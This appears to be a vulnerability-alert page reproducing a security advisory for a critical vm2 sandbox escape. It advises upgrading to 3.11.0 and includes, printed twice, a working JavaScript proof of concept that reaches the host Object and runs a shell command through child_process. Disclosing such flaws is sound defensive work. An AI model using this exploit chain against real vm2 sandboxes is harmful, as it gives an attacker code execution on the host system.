Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
10.0
CVE-2026-43997: vm2 Sandbox Escape Allows Malicious Code Execution
GHSA-47x8-96vw-5wg6
CVE-2026-43997
Summary
The vm2 JavaScript engine has a vulnerability that allows an attacker to escape the sandbox and execute malicious code on the host system. This could lead to unauthorized access and control of the system. To protect against this vulnerability, update to the latest version of vm2, which includes additional protections against sandbox escape.
What to do
- Update GitHub Actions vm2 to version 3.11.0.
- Update vm2 to version 3.11.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | GitHub Actions | vm2 |
<= 3.10.5 Fix: upgrade to 3.11.0
|
| npm | – | vm2 |
<= 3.10.5 Fix: upgrade to 3.11.0
|
Original title
vm2 Access to Host Object Enables Sandbox Escape
Original description
### Summary
It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.
### Details
There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`
### PoC
```js
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
const obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
```
### Impact
Sandbox Escape -> RCE
It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.
### Details
There are various ways to use the host `Object`, to escape the sandbox, one example would be using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`
### PoC
```js
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
const obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
```
### Impact
Sandbox Escape -> RCE
ghsa CVSS3.1
10.0
Vulnerability type
CWE-94
Code Injection
Published: 7 May 2026 · Updated: 30 May 2026 · First seen: 7 May 2026